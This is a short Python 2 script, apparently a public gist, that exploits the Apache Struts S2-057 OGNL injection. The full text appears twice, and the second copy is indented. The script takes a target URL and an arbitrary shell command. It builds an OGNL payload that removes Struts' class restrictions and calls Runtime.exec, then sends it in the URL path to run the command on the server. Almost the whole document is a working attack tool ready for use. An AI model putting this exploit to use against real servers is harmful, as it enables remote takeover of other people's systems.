frohoff/s2-057.py

## s2-057.py
# some ideas from https://mp.weixin.qq.com/s/iBLrrXHvs7agPywVW7TZrg

import sys
import urllib
import urllib2

if len(sys.argv) != 3:
    print 'Usage: %s [url] [command]' % sys.argv[0]
    exit(1)

_, url, cmd = sys.argv

payload = "${(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#context=#request['struts.valueStack'].context).(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.setExcludedPackageNames('')).(#ognlUtil.setExcludedClasses('')).(#context.setMemberAccess(#dm)).(#cmd=@java.lang.Runtime@getRuntime().exec('%s'))}" % (cmd.replace('\\','\\\\').replace("'","\\'"))

url_parts = url.rsplit('/', 1)

request = url_parts[0] + '/' + urllib.quote(payload) + '/' + url_parts[1]

print 'payload: %s' % payload
print 'request: %s' % request
print 'making request'
urllib.urlopen(request)
print 'done'
	# some ideas from https://mp.weixin.qq.com/s/iBLrrXHvs7agPywVW7TZrg

	import sys
	import urllib
	import urllib2

	if len(sys.argv) != 3:
	print 'Usage: %s [url] [command]' % sys.argv[0]
	exit(1)

	_, url, cmd = sys.argv

	payload = "${(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#context=#request['struts.valueStack'].context).(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.setExcludedPackageNames('')).(#ognlUtil.setExcludedClasses('')).(#context.setMemberAccess(#dm)).(#cmd=@java.lang.Runtime@getRuntime().exec('%s'))}" % (cmd.replace('\\','\\\\').replace("'","\\'"))

	url_parts = url.rsplit('/', 1)

	request = url_parts[0] + '/' + urllib.quote(payload) + '/' + url_parts[1]

	print 'payload: %s' % payload
	print 'request: %s' % request
	print 'making request'
	urllib.urlopen(request)
	print 'done'